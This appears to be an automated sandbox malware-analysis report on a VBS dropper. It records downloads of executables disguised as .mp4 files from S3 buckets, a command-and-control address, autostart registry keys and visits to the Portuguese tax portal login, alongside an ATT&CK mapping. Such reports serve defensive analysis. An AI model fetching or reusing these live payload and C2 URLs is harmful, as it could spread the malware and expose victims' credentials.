Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: lspcv2.exe, 00000009.00000000.2126202000.0000000001E9E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Cs6_ZN23Overbyteicscharsetutils22InitializeCharsetInfosEv,_ZN23Overbyteicscharsetutils12FinalizationEv._ZN23Overbyteicscharsetutils14initializationEv+_ZN23Overbyteicscharsetutils12MAX_CODEPAGEE/_ZN23Overbyteicscharsetutils16ERR_CP_NOTMAPPEDE2_ZN23Overbyteicscharsetutils19ERR_CP_NOTAVAILABLEE*_ZN23Overbyteicscharsetutils11CP_US_ASCIIE)_ZN23Overbyteicscharsetutils10CS_DEFAULTE+_ZN23Overbyteicscharsetutils12CS_NOTMAPPEDE#_ZN23Overbyteicscharsetutils5UTF_8E&_ZN23Overbyteicscharsetutils8WIN_1250E&_ZN23Overbyteicscharsetutils8WIN_1251E&_ZN23Overbyteicscharsetutils8WIN_1252E&_ZN23Overbyteicscharsetutils8WIN_1253E&_ZN23Overbyteicscharsetutils8WIN_1254E&_ZN23Overbyteicscharsetutils8WIN_1255E&_ZN23Overbyteicscharsetutils8WIN_1256E&_ZN23Overbyteicscharsetutils8WIN_1257E&_ZN23Overbyteicscharsetutils8WIN_1258E)_ZN23Overbyteicscharsetutils10ISO_8859_1E)_ZN23Overbyteicscharsetutils10ISO_8859_2E)_ZN23Overbyteicscharsetutils10ISO_8859_3E)_ZN23Overbyteicscharsetutils10ISO_8859_4E)_ZN23Overbyteicscharsetutils10ISO_8859_5E)_ZN23Overbyteicscharsetutils10ISO_8859_6E)_ZN23Overbyteicscharsetutils10ISO_8859_7E)_ZN23Overbyteicscharsetutils10ISO_8859_8E+_ZN23Overbyteicscharsetutils12ISO_8859_8_iE)_ZN23Overbyteicscharsetutils10ISO_8859_9E*_ZN23Overbyteicscharsetutils11ISO_8859_13E*_ZN23Overbyteicscharsetutils11ISO_8859_15E*_ZN23Overbyteicscharsetutils11ISO_2022_JPE,_ZN23Overbyteicscharsetutils13ISO_2022_JP_1E,_ZN23Overbyteicscharsetutils13ISO_2022_JP_2E*_ZN23Overbyteicscharsetutils11ISO_2022_KRE*_ZN23Overbyteicscharsetutils11ISO_2022_CNE'_ZN23Overbyteicscharsetutils9X_CP50227E$_ZN23Overbyteicscharsetutils6EUC_JPE)_ZN23Overbyteicscharsetutils10GB_2312_80E%_ZN23Overbyteicscharsetutils7GB_2312E)_ZN23Overbyteicscharsetutils10HZ_GB_2312E&_ZN23Overbyteicscharsetutils8GB_18030E$_ZN23Overbyteicscharsetutils6EUC_CNE$_ZN23Overbyteicscharsetutils6KOI8_RE$_ZN23Overbyteicscharsetutils6KOI8_UE&_ZN23Overbyteicscharsetutils8UTF_16LEE&_ZN23Overbyteicscharsetutils8UTF_16BEE#_ZN23Overbyteicscharsetutils5UTF_7E'_ZN23Overbyteicscharsetutils9SHIFT_JISE#_ZN23Overbyteicscharsetutils5BIG_5E,_ZN23Overbyteicscharsetutils13KOREAN_HANGULE$_ZN23Overbyteicscharsetutils6EUC_KRE%_ZN23Overbyteicscharsetutils7WIN_874E%_ZN23Overbyteicscharsetutils7IBM_037E%_ZN23Overbyteicscharsetutils7IBM_437E%_ZN23Overbyteicscharsetutils7IBM_500E%_ZN23Overbyteicscharsetutils7IBM_850E%_ZN23Overbyteicscharsetutils7IBM_852E%_ZN23Overbyteicscharsetutils7IBM_855E%_ZN23Overbyteicscharsetutils7IBM_857E'_ZN23Overbyteicscharsetutils9IBM_00858E%_ZN23Overbyteicscharsetutils7IBM_860E%_ZN23Overbyteicscharsetutils7IBM_861E%_ZN23Overbyteicscharsetutils7IBM_862E%_ZN23Overbyteicscharsetutils7IBM_863E%_ZN23Overbyteicscharsetutils7IBM_864E%_ZN23Overbyteicscharsetutils7IBM_865E%_ZN23Overbyteicscharsetutils7IBM_866E%_ZN23Overbyteicscharsetutils7IBM_869E%_ZN23Overbyteicscharsetutils7IBM_870E&_ZN23Overbyteicscharsetutils8IBM_1026E'_ZN23Overbyteicscharsetutils9IBM_01047E'_ZN23Overbyteicscharsetutils9IBM_01140E'_ZN23Overbyteicscharsetutils9IBM_01141
Source: lspcv2.exe, 00000009.00000000.2126202000.0000000001E9E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: %_ZN23Overbyteicscharsetutils7WIN_874E
Source: lspcv2.exe, 00000009.00000000.2116894129.00000000001DB000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: WIN_874

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information21
Scripting		Valid Accounts1
Exploitation for Client Execution		21
Scripting		112
Process Injection		11
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder		11
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		112
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Multi-hop Proxy		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input Capture1
Proxy		Data Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555843 Sample: guia_luqf.vbs Startdate: 14/11/2024 Architecture: WINDOWS Score: 88 46 s3.timeweb.com 2->46 48 s3-r-w.eu-north-1.amazonaws.com 2->48 50 2 other IPs or domains 2->50 72 Sigma detected: WScript or CScript Dropper 2->72 74 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->74 76 Sigma detected: Suspicious Program Location with Network Connections 2->76 78 2 other signatures 2->78 8 wscript.exe 1 21 2->8         started        13 lspcv2.exe 17 2->13         started        15 lspcv2.exe 13 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 60 s3-r-w.eu-north-1.amazonaws.com 16.12.9.14 unknown United States 8->60 42 C:\Users\Public\Termos\artigo.exe, PE32+ 8->42 dropped 44 C:\Users\Public\Termos.zip, Zip 8->44 dropped 82 System process connects to network (likely due to code injection or exploit) 8->82 84 Benign windows process drops PE files 8->84 86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->86 19 artigo.exe 18 8->19         started        24 chrome.exe 8->24         started        62 s3.timeweb.com 92.53.116.138 TIMEWEB-ASRU Russian Federation 13->62 file6 signatures7 process8 dnsIp9 52 16.12.9.46 unknown United States 19->52 34 C:\Users\user\...\basketchampion[1].mp4, PE32+ 19->34 dropped 36 C:\Users\user\AppData\...\alphaville[1].mp4, PE32+ 19->36 dropped 38 C:\Intrumental\place.exe, PE32+ 19->38 dropped 40 C:\Intrumental\lspcv2.exe, PE32+ 19->40 dropped 80 May use the Tor software to hide its network traffic 19->80 26 lspcv2.exe 1 19->26         started        30 place.exe 1 19->30         started        54 192.168.2.4 unknown unknown 24->54 56 192.168.2.16 unknown unknown 24->56 58 239.255.255.250 unknown Reserved 24->58 32 chrome.exe 24->32         started        file10 signatures11 process12 dnsIp13 64 94.241.141.101 ATRINCOMMUNICATIONIR Iran (ISLAMIC Republic Of) 26->64 88 Creates multiple autostart registry keys 26->88 66 www.portaldasfinancas.gov.pt 62.28.254.212 MEO-EMPRESASPT Portugal 32->66 68 www.acesso.gov.pt 62.28.254.215 MEO-EMPRESASPT Portugal 32->68 70 4 other IPs or domains 32->70 signatures14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Intrumental\lspcv2.exe5%ReversingLabs
C:\Intrumental\place.exe17%ReversingLabs
C:\Users\Public\Termos\artigo.exe5%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp417%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp45%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4B0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp40%Avira URL Cloudsafe
https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdr0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp430%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4%0%Avira URL Cloudsafe
http://94.241.141.101/dm4/publi.php0%Avira URL Cloudsafe
http://94.241.141.101/dm4/publi.php030%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4010%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4C0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Y0%Avira URL Cloudsafe
https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/prefere0%Avira URL Cloudsafe
http://185.178.46.42/vo/U0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bif0%Avira URL Cloudsafe
https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp40%Avira URL Cloudsafe
https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=C0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.portaldasfinancas.gov.pt
62.28.254.212
truefalse
    		high
    s3.timeweb.com
    		92.53.116.138
    		truefalse
      		high
      s3-r-w.eu-north-1.amazonaws.com
      		16.12.9.14
      		truefalse
        		high
        sni1gl.wpc.rhocdn.net
        		152.199.21.175
        		truefalse
          		high
          www.google.com
          		142.250.185.196
          		truefalse
            		high
            www.acesso.gov.pt
            		62.28.254.215
            		truefalse
              		high
              static.portaldasfinancas.gov.pt
              		unknown
              		unknownfalse
                		high
                happychristmaslegado.s3.eu-north-1.amazonaws.com
                		unknown
                		unknownfalse
                  		unknown
                  privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.10false
                      		high
                      https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4true
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.pngfalse
                        		high
                        https://www.acesso.gov.pt/autentica_static/icons/favicon.icofalse
                          		high
                          https://s3.timeweb.com/41907bc4-chronocromdocrom/integra/conf.txtfalse
                            		high
                            https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10false
                              		high
                              https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.10false
                                		high
                                https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.10false
                                  		high
                                  https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.10false
                                    		high
                                    https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.10false
                                      		high
                                      https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10false
                                        		high
                                        https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10false
                                          		high
                                          https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardfalse
                                            		high
                                            https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10false
                                              		high
                                              https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.jsfalse
                                                		high
                                                https://www.portaldasfinancas.gov.pt/at/html//autentica_static/logos/logotipo_AT.pngfalse
                                                  		high
                                                  https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10false
                                                    		high
                                                    https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.10false
                                                      		high
                                                      https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.10false
                                                        		high
                                                        https://www.acesso.gov.pt/autentica_static/img/background.pngfalse
                                                          		high
                                                          https://www.acesso.gov.pt/autentica_static/img/logo-at.pngfalse
                                                            		high
                                                            https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.pngfalse
                                                              		high
                                                              https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.10false
                                                                		high
                                                                https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.10false
                                                                  		high
                                                                  https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.10false
                                                                    		high

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    http://94.241.141.101/dm4/publi.php03lspcv2.exe, 00000009.00000002.2982463608.00000145E4A03000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://94.241.141.101/dm4/lspcv2.exe, 00000009.00000002.2982463608.00000145E4A0A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp43artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://heapanalytics.com/js/ved.jswscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4%artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardrvcwscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://94.241.141.101/dm4/publi.phplspcv2.exe, 00000009.00000002.2982463608.00000145E49BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4Bartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4Cartigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp401artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
